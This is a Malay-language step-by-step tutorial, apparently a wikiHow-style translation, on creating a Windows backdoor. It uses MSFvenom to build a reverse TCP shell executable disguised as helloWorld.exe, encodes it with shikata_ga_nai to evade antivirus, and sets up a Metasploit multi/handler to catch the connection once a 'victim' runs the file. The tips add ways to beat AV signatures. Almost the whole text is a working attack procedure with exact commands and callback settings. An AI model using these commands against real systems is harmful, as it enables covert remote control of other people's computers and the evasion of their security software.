Pintu belakang digunakan untuk memintas mekanisme keselamatan, selalunya secara rahsia dan kebanyakannya tidak dapat dikesan. Dengan menggunakan MSFvenom, gabungan msfpayload dan msfencode, adalah mungkin untuk membuat pintu belakang yang menghubungkan kembali ke penyerang dengan menggunakan TCP shell terbalik. Untuk mengembangkan pintu belakang, anda perlu mengubah tandatangan perisian hasad anda untuk mengelakkan sebarang perisian antivirus. Selesaikan projek ini pada sepasang komputer yang boleh anda akses, dan dalam prosesnya, anda akan mengetahui lebih lanjut mengenai keselamatan komputer dan cara kerja pintu belakang seperti ini.
Langkah-langkah
Langkah 1. Mulakan Kali dan jalankan konsol Terminal
Langkah 2. Ketik ifconfig untuk memaparkan antara muka dan periksa alamat IP anda
Langkah 3. Taip pengekod msfvenom -l untuk menunjukkan senarai pengekod
Anda akan menggunakan x86 / shikata_ga_nai sebagai pengekod
Langkah 4. Ketik "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 - tingkap platform menetapkan seni bina untuk digunakan.
- -p windows / shell / reverse_tcp menetapkan muatan yang akan dibenamkan.
- LHOST menetapkan alamat IP pendengar.
- LPORT menetapkan port pendengar.
- -b "\ x00" menetapkan untuk mengelakkan watak buruk (null byte).
- -e x86 / shikata_ga_nai menetapkan nama pengekod.
- -f exe> helloWorld.exe menetapkan format output.
Langkah 5. Ketik msfconsole untuk mengaktifkan Metasploit
Sekarang anda telah menghasilkan pintu belakang anda. Apabila mangsa mengklik helloWorld.exe, muatan shell yang tersemat akan diaktifkan dan membuat sambungan kembali ke sistem anda. Untuk mendapat sambungan, anda harus membuka multi-handler di Metasploit dan menetapkan muatan
Langkah 6. Jenis gunakan exploit / multi / pengendali
Langkah 7. Ketik tetapkan payload windows / shell / reverse_tcp
Langkah 8. Taipkan pilihan tunjuk untuk memeriksa modul
Langkah 9. Jenis set LHOST 192.168.48.129
"LHOST" menetapkan alamat IP pendengar
Langkah 10. Jenis set LPORT 4444
"LPORT" menetapkan port pendengar
Langkah 11. Ketik jalankan dan tunggu sambungan dari mesin mangsa
Langkah 12. Tunggu mangsa mengklik helloWorld.exe
Kemudian anda akan berjaya dihubungkan ke mesin mangsa.
Petua
- Menggunakan -i di MSFvenom akan mewakili lelaran pengekodan. Kadang-kadang lebih banyak lelaran dapat membantu mengelakkan perisian AV.
- Anda telah belajar bagaimana menghasilkan pintu belakang dan dikodkan dengan menggunakan MSFvenom, tetapi kaedah ini tidak akan berfungsi dengan sempurna terhadap beberapa perisian AV pada masa ini. Sebab di sebalik ini adalah kerana templat pelaksanaan di MSFvenom. Vendor AV telah menambahkan tandatangan statik templat ini dan hanya mencarinya. Penyelesaian untuk masalah ini adalah dengan menggunakan templat pelaksanaan yang berbeza atau alat yang berbeza.